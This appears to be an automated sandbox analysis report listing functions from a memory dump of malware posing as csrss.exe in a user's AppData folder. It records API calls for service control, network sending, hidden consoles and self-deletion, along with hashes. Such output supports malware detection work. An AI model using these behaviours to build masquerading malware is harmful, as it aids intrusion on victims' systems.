Opcode ID: c927bf04d19367cdd1f83cae4c2114a4edd7673b2d612f9406288f0be772ed05
Instruction ID: bbd53970377ab4b16cce1627fd8c0566f019922c795647bdb0fd588c421601c8
Opcode Fuzzy Hash: c927bf04d19367cdd1f83cae4c2114a4edd7673b2d612f9406288f0be772ed05
Instruction Fuzzy Hash: B8410771E04314AAFB115BF99C80BEE3FA8EF45770F540265F838EB990EA74994147B1

Function 33D82801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832531495952a7868a40df19e1a40d4dd7dccecd8b148d00dbf3036f351b4e68
Instruction ID: 9afa79705e10efb53c10e48f26b4ec2993e6fa009ba20edf281e72bb8aafb62a
Opcode Fuzzy Hash: 832531495952a7868a40df19e1a40d4dd7dccecd8b148d00dbf3036f351b4e68
Instruction Fuzzy Hash: 7841D7B6A40704BFE7149F78CC40B9ABBF9EB88710F108A6AF055DFA90D671B54187A0

Function 33D51B5F Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 33D51B8C
IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 33D51C58
SetLastError.KERNEL32(0000007F), ref: 33D51C7A
SetLastError.KERNEL32(0000007E,33D51EF0), ref: 33D51C91

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: ea7b851bdfffe5debb4f0e55d54eafa4787e2d1a965717e5ce9e7e4cf0dde430
Instruction ID: 9dff8f691e9b80c9e112e36a3fa26bc6d73ebfcc9d4e55860342a5beb94a004b
Opcode Fuzzy Hash: ea7b851bdfffe5debb4f0e55d54eafa4787e2d1a965717e5ce9e7e4cf0dde430
Instruction Fuzzy Hash: A0417BB96043059FFF148F19D985B36B3E8FB48B11F04042DF99ACA651EB72E905CB11

Function 33D9112C Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,33D9D518,00000000,00000000,8B56FF8B,33D844CA,?,00000004,00000001,33D9D518,0000007F,?,8B56FF8B,00000001), ref: 33D91179
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 33D91202
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 33D91214
__freea.LIBCMT ref: 33D9121D

Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 8ec4534d72d5915b86756f401fac508f271e95d60b4cb7139323fd04d760c30d
Instruction ID: ec12b3b7932a6fd7da7e4d0a365c5b657521ddc554b665852e4a3afe2ab14e1d
Opcode Fuzzy Hash: 8ec4534d72d5915b86756f401fac508f271e95d60b4cb7139323fd04d760c30d
Instruction Fuzzy Hash: 6F31EF76A0020AABEF15DFA4CC81DEE7BA5EF00B10F444169FC04EB290E735CA55CBA0

Function 33D594C4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(00000000,00000000,33D595CF,00000000), ref: 33D594F5
EnumDisplayDevicesW.USER32(?), ref: 33D59525
EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 33D5959A
EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 33D595B7

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: DisplayEnum$Devices$Monitors
String ID:
API String ID: 1432082543-0
Opcode ID: de90b8350f928a444450ebe4faa1f59974bea69e3d85a08636cccabcd136679a
Instruction ID: c75b97537c576a3611699a0261eba5861d6282e3a1615bf2d5b48d3da61ba689
Opcode Fuzzy Hash: de90b8350f928a444450ebe4faa1f59974bea69e3d85a08636cccabcd136679a
Instruction Fuzzy Hash: 9C216172508304ABD320DE16DC48E9BBBFCEFD1694F50052EB496D3550EF719609C661

Function 33D4549F Relevance: 6.1, APIs: 4, Instructions: 77windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 33D454BF
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 33D4556F
TranslateMessage.USER32(?), ref: 33D4557E
DispatchMessageA.USER32(?), ref: 33D45589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,33DB4F78), ref: 33D45641
HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 33D45679

Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID:
API String ID: 2956720200-0
Opcode ID: 5cfc2c3788720dd667c94e61fbc7cca40138eb438a08ee2d353196f6df5a1e63
Instruction ID: 2837cefa8cd24e7e35d532023a1cb5570b19c37bef5313b6d1527ad0652dcf22
Opcode Fuzzy Hash: 5cfc2c3788720dd667c94e61fbc7cca40138eb438a08ee2d353196f6df5a1e63
Instruction Fuzzy Hash: 3C219276D04301ABDB00EF75CD998AE77F9AF89640F440A18F96293994EF34D609CB62

Function 33D5AC78 Relevance: 6.1, APIs: 4, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 33D5AC88
OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 33D5AC9C
CloseServiceHandle.ADVAPI32(00000000), ref: 33D5ACA9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33D5ACDE

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Service$Open$ChangeCloseConfigHandleManager
String ID:
API String ID: 110783151-0
Opcode ID: 138e013c1d0c106902ebb3f54bad2f90809593aedf5fd4874b3e762300461910
Instruction ID: 857c045556748203d54a41b837de2af4493ac0c2c0114f38ff444e797c331467
Opcode Fuzzy Hash: 138e013c1d0c106902ebb3f54bad2f90809593aedf5fd4874b3e762300461910
Instruction Fuzzy Hash: 8501D27A1443257BFB125B2DCC4AEBA3BACDB42670F010205F97AE65C0DF609A0695A1

Function 33D5C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 33D5C49E
GetFileSize.KERNEL32(00000000,00000000), ref: 33D5C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 33D5C4D7
CloseHandle.KERNEL32(00000000), ref: 33D5C4E5

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 58f8c5b3297ad85847667f17f58d04a24476e30a0d29957506864655d6eb2a8b
Instruction ID: 2399de813a3ba81ec30ef122cb0c341073b6cf883aecd2c14d4c9f9b59032604
Opcode Fuzzy Hash: 58f8c5b3297ad85847667f17f58d04a24476e30a0d29957506864655d6eb2a8b
Instruction Fuzzy Hash: ECF062B66423187FF6106B35EC84EBB379CEB86AA5F000229F942B32C0CB255D0A9131

Function 33D5CD9B Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32 ref: 33D5CDA4
GetConsoleWindow.KERNEL32 ref: 33D5CDAA
ShowWindow.USER32(00000000,00000000), ref: 33D5CDBD
SetConsoleOutputCP.KERNEL32(000004E4), ref: 33D5CDE2

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Console$Window$AllocOutputShow
String ID:
API String ID: 4067487056-0
Opcode ID: d8286828e8a0d9ca0ec5bf71621fd6fe87ce4c5f08d467d9bb073936ce198e2b
Instruction ID: 400721e45b5d1dad577c269cbbc801c234a72f10fdfd7010a620e146fae1be4c
Opcode Fuzzy Hash: d8286828e8a0d9ca0ec5bf71621fd6fe87ce4c5f08d467d9bb073936ce198e2b
Instruction Fuzzy Hash: C0012CB2D42308AEDA10FBF8CD49F8D77ACAF14641F500461B614EB482EBB5A61C8A75

Function 33D79863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 33D7987A

Part of subcall function 33D79EB2: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 33D79EE1
Part of subcall function 33D79EB2: ___AdjustPointer.LIBCMT ref: 33D79EFC

_UnwindNestedFrames.LIBCMT ref: 33D79891
___FrameUnwindToState.LIBVCRUNTIME ref: 33D798A3
CallCatchBlock.LIBVCRUNTIME ref: 33D798C7

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: b2cf0bc5507018ffb27b75620de57d3e93a51bbcb483c4a2d25d1016d06f90c2
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 3001E532400209BBCF129F55CC00EDA3BBAFF88754F058125FA5966620C736E8A1DBA0

Function 33D5ABAA Relevance: 6.0, APIs: 4, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 33D5ABB9
OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 33D5ABCD
CloseServiceHandle.ADVAPI32(00000000), ref: 33D5ABDA
ControlService.ADVAPI32(00000000,00000002,?), ref: 33D5ABE9

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: bf3b5a896f1dc38693045663bc596073c569bcbc7a5fda14eaf666f80cdaeac8
Instruction ID: 061b46c70d5b9880422e81e2f9f71df7fe3f04a408a55cd32f0103e6244ff5f7
Opcode Fuzzy Hash: bf3b5a896f1dc38693045663bc596073c569bcbc7a5fda14eaf666f80cdaeac8
Instruction Fuzzy Hash: 2CF0C2325002286BE7217B25CC89EBF3BACDB45651F410015FE1EE2141EF348D1685F1

Function 33D5AAA6 Relevance: 6.0, APIs: 4, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020), ref: 33D5AAB5
OpenServiceW.ADVAPI32(00000000,00000000,00000020), ref: 33D5AAC9
CloseServiceHandle.ADVAPI32(00000000), ref: 33D5AAD6
ControlService.ADVAPI32(00000000,00000001,?), ref: 33D5AAE5

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: a564b7640006588e17d1140c93529fc9027091beed7dffa435dee88013b5c8e5
Instruction ID: 343aa8847993be2b8cccd77d1e8966aa9296b82ba0dcb0d377f71dc06a824725
Opcode Fuzzy Hash: a564b7640006588e17d1140c93529fc9027091beed7dffa435dee88013b5c8e5
Instruction Fuzzy Hash: AAF0C2325403286BE721BB25CC89EBF3BACDB45651F010015FD1AE2141DF748D5785F0

Function 33D5AC11 Relevance: 6.0, APIs: 4, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 33D5AC20
OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 33D5AC34
CloseServiceHandle.ADVAPI32(00000000), ref: 33D5AC41
ControlService.ADVAPI32(00000000,00000003,?), ref: 33D5AC50

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: 927e12c477ad3e937fe87eb629c46229ca887ffef62b8d56d953e46a9e60c5ab
Instruction ID: 0f112cecce39ede1d20334097ee109feefd3cd59dbf3082174cb39a1c9c053f7
Opcode Fuzzy Hash: 927e12c477ad3e937fe87eb629c46229ca887ffef62b8d56d953e46a9e60c5ab
Instruction Fuzzy Hash: 09F0C2365002286BE721BB29CC89EBF3BACDB45651F010015FE1EE6141DF348D1685F0

Function 33D5AA4A Relevance: 6.0, APIs: 4, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,33D5A6A0,00000000), ref: 33D5AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,33D5A6A0,00000000), ref: 33D5AA68
CloseServiceHandle.ADVAPI32(00000000,?,33D5A6A0,00000000), ref: 33D5AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,33D5A6A0,00000000), ref: 33D5AA80

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Service$Open$CloseHandleManagerStart
String ID:
API String ID: 2553746010-0
Opcode ID: 1733d7f1de2e8ccad6543caf099375b73649283e9e79c37e49f61682573ab929
Instruction ID: 7143e0a8ba1fd7039dda6efda5381deec21a43da2894e24b76516f483a4231a8
Opcode Fuzzy Hash: 1733d7f1de2e8ccad6543caf099375b73649283e9e79c37e49f61682573ab929
Instruction Fuzzy Hash: 28F0E9735013256FF211AB20CC89DFF2BACDF85691B010015F85AE20009F748C479971

Function 33D450E4 Relevance: 6.0, APIs: 4, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,33DB4EF8,33D44E7A,00000001), ref: 33D45120
SetEvent.KERNEL32(?), ref: 33D4512C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 33D45137
CloseHandle.KERNEL32(?), ref: 33D45140

Part of subcall function 33D5B4EF: GetLocalTime.KERNEL32(00000000), ref: 33D5B509

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID:
API String ID: 2993684571-0
Opcode ID: 2e7921da8c3c7a45a91a357630b336e0b1cab7d8b8fc58b01a9b25cb5b59f5bd
Instruction ID: 40483bf48574124e3a51b4b7298ad82bbeda9693dc9462177a23576a06b3e51c
Opcode Fuzzy Hash: 2e7921da8c3c7a45a91a357630b336e0b1cab7d8b8fc58b01a9b25cb5b59f5bd
Instruction Fuzzy Hash: 35F0E976C04300FFEB203BB4CD0996A7FD9AB06210F40055DF8D391661CE714455DF62

Function 33D5CD58 Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,33D5CDED), ref: 33D5CD62
GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 33D5CD6F
SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 33D5CD7C
SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 33D5CD8F

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID:
API String ID: 3024135584-0
Opcode ID: ad05129efe52554edfdcc5d9418f04f88b9da5733427132706100b7b4ae818b6
Instruction ID: 5df9b33dbf84c8efefb09fbbf777777a0f4353634b4b82d09bd18fbc3b021df3
Opcode Fuzzy Hash: ad05129efe52554edfdcc5d9418f04f88b9da5733427132706100b7b4ae818b6
Instruction Fuzzy Hash: A9E04873900304ABE71037B5DC4DDAB7BACF745626B100656FA13B1182997044458671

Function 33D78F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 33D78F31
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 33D78F36
___vcrt_initialize_locks.LIBVCRUNTIME ref: 33D78F3B

Part of subcall function 33D7A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 33D7A44B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 33D78F50

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: 1e87cec3c3a6db31621faecac389800d9771f1df95f6054e5112ce263bf4d25a
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 2EC04809C0878568BC847EF0620629D834A2F62ACABC464DA8CDCA7E02CE0B000B6237

Function 33D7B710 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 33D7B87C

Strings

+, xrefs: 33D7B7B9
-, xrefs: 33D7B7AC

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 2c53b2485f5ea0e8d1fa6fabd9bd7dffc814f05ba4e877e743aa15997dc192b1
Instruction ID: 9d5ee863cda05d81f62809d6d46e73dd1e3ee7b0ee3cc328925533abcea7c104
Opcode Fuzzy Hash: 2c53b2485f5ea0e8d1fa6fabd9bd7dffc814f05ba4e877e743aa15997dc192b1
Instruction Fuzzy Hash: 6491E2B4D043499FEF10CE68C8506EDBBB5EF45764F58825AE8F4AB390D7309902CB61

Function 33D58A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 33D58ABE
SHCreateMemStream.SHLWAPI(00000000), ref: 33D58B0B

Strings

image/jpeg, xrefs: 33D58AD5

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CreateStream
String ID: image/jpeg
API String ID: 1369699375-3785015651
Opcode ID: 3622cac1d5dbdfd4c53dd8ab55c7df5e732a0569ea6e7064e947a89e4dff7be6
Instruction ID: 2e86f8a88654003c3778d2ff756a30712924b820a2c838ba07e920e5c0fbe01e
Opcode Fuzzy Hash: 3622cac1d5dbdfd4c53dd8ab55c7df5e732a0569ea6e7064e947a89e4dff7be6
Instruction Fuzzy Hash: AE314B72A15304AFD701DF65C884D6FBBE9FF8A704F00095EF986D7210DB7599058BA2

Function 33D91B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,33D91D92,?,00000050,?,?,?,?,?), ref: 33D91C12

Strings

ACP, xrefs: 33D91B55
OCP, xrefs: 33D91B8B

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3b2fd2cbe42bfb69931606489b3e547aa3661c40705ceb8cea143528814c2a03
Instruction ID: 5bde384f49d3dbd3094f0a9cb4b8f44bbf5bcc73a333606521dc6ca2ec8e39eb
Opcode Fuzzy Hash: 3b2fd2cbe42bfb69931606489b3e547aa3661c40705ceb8cea143528814c2a03
Instruction Fuzzy Hash: 0D21C86AA44301A6F715CF64C901BCB73AFEF45FA9F8A4564E94AD7600F732D940C390

Function 33D58B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 33D58BAA
SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 33D58BCF

Strings

image/png, xrefs: 33D58BC1

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CreateStream
String ID: image/png
API String ID: 1369699375-2966254431
Opcode ID: 462550aca72f385f9ae166bcd9722931fe9944283d5c0c064441ee4a2149571e
Instruction ID: 06ccfce7c9fec8c7737fe1331a7be7020120ef44138d0ebebb60ac8a2d908dbe
Opcode Fuzzy Hash: 462550aca72f385f9ae166bcd9722931fe9944283d5c0c064441ee4a2149571e
Instruction Fuzzy Hash: C6219D32A05314AFC700EB64CC88CAFBBADEF8A650B10091DF50693210DF3499468BA2

Function 33D475B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 33D475D0

Part of subcall function 33D474FD: CoGetObject.OLE32(?,00000024,33DA6518,00000000), ref: 33D47582

CoUninitialize.OLE32 ref: 33D47629

Strings

C:\Users\user\AppData\Roaming\csrss.exe, xrefs: 33D475B0, 33D475B3, 33D47605

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: InitializeObjectUninitialize
String ID: C:\Users\user\AppData\Roaming\csrss.exe
API String ID: 887581436-2596686549
Opcode ID: 2db6717ebd8f30ee2435f3b12548fd46905b4f5b0ac192066333fb235936a6b3
Instruction ID: 667ac956ab94f42e554bbdbc76dcefe19e6db528d032b75a2477a7b2d0e517c9
Opcode Fuzzy Hash: 2db6717ebd8f30ee2435f3b12548fd46905b4f5b0ac192066333fb235936a6b3
Instruction Fuzzy Hash: 57012476605300AFF3646B78ED4DF6B378DDF40B69F14081EF92596082EFA0AC054AB0

Function 33D8F077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

_abort.LIBCMT ref: 33D8F0A9
_free.LIBCMT ref: 33D8F0DD

Strings

XKz, xrefs: 33D8F0E3, 33D8F0EB

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: XKz
API String ID: 289325740-1051961590
Opcode ID: 1407a27e88305560ec2c22134000bd3628591f597b22fd3d465a3a5bbd97b39a
Instruction ID: 1d37696c8c5e9af7f922f128c6a8843ea6b2fc57f1cc96f6e24ab95db7642929
Opcode Fuzzy Hash: 1407a27e88305560ec2c22134000bd3628591f597b22fd3d465a3a5bbd97b39a
Instruction Fuzzy Hash: 29018BB6D11B21DFCB219F69D40021DB7A8FF04B62B58030AD8A16FA80CB3039528FD1

Function 33D4B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 33D4B876
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 33D4B8A1

Strings

pth_unenc, xrefs: 33D4B869

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: c5e9f30218c6f1e2f685a259df5a2c4109ba23022fb8cb3a28fb0429f03f8418
Instruction ID: 7cc0f1c64ada3b3e1026e528448ff46ad2b45aab83bce4d9817d0e294d3aa053
Opcode Fuzzy Hash: c5e9f30218c6f1e2f685a259df5a2c4109ba23022fb8cb3a28fb0429f03f8418
Instruction Fuzzy Hash: 34E08C765407118BC750AB35C948ADA339CAF18115B40040AE493A3501DF70A90AC670

Function 33D52850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,33D4F8C8), ref: 33D52860
WaitForSingleObject.KERNEL32(000000FF), ref: 33D52873

Strings

pth_unenc, xrefs: 33D52850

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 9e2347224abc4bc749bcbeb5146fd6495c8f86bff1f9b5f755e37ef4b0bb9c1c
Instruction ID: e466d34fe6148f0c65c11806f243af6ec83aea9a90e5564c58adb217f2a2598f
Opcode Fuzzy Hash: 9e2347224abc4bc749bcbeb5146fd6495c8f86bff1f9b5f755e37ef4b0bb9c1c
Instruction Fuzzy Hash: 78D0C937289212EBD7662F60CD48B093AD8A7057A1F540305B461752E4D7654516EBD0

Function 33D80C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 33D80D27
GetLastError.KERNEL32 ref: 33D80D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 33D80D90

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
